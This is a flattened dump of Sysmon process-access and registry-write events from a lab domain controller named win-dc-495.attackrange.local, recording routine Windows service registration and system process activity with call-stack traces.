10341000x800000000000000010201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.477{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1dc37|C:\Windows\system32\services.exe+17f38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x800000000000000010194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x800000000000000010193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\FailureActionsBinary Data 13241300x800000000000000010192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\Security\SecurityBinary Data 13241300x800000000000000010191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\DisplayNameWindows Push Notifications User Service_2d0727 13241300x800000000000000010190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2d0727\TypeDWORD (0x000000e0) 
13241300x800000000000000010186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x800000000000000010185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\DisplayNameUser Data Access_2d0727 13241300x800000000000000010182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x800000000000000010177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\DisplayNameUser Data Storage_2d0727 13241300x800000000000000010174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 
13241300x800000000000000010173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x800000000000000010169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\DisplayNameContact Data_2d0727 13241300x800000000000000010166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\StartDWORD (0x00000003) 13241300x800000000000000010163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2d0727\TypeDWORD (0x000000e0) 13241300x800000000000000010162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x800000000000000010161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\DisplayNameSync Host_2d0727 13241300x800000000000000010158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\ErrorControlDWORD (0x00000000) 13241300x800000000000000010156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\StartDWORD (0x00000002) 13241300x800000000000000010155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2d0727\TypeDWORD (0x000000e0) 
13241300x800000000000000010154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 13241300x800000000000000010153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\FailureActionsBinary Data 13241300x800000000000000010152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\Security\SecurityBinary Data 13241300x800000000000000010151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\DisplayNameCDPUserSvc_2d0727 13241300x800000000000000010150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x800000000000000010149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\ErrorControlDWORD (0x00000001) 13241300x800000000000000010148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 
13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\StartDWORD (0x00000002) 13241300x800000000000000010147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:17.461{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2d0727\TypeDWORD (0x000000e0) 10341000x800000000000000010146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.446{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000010144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
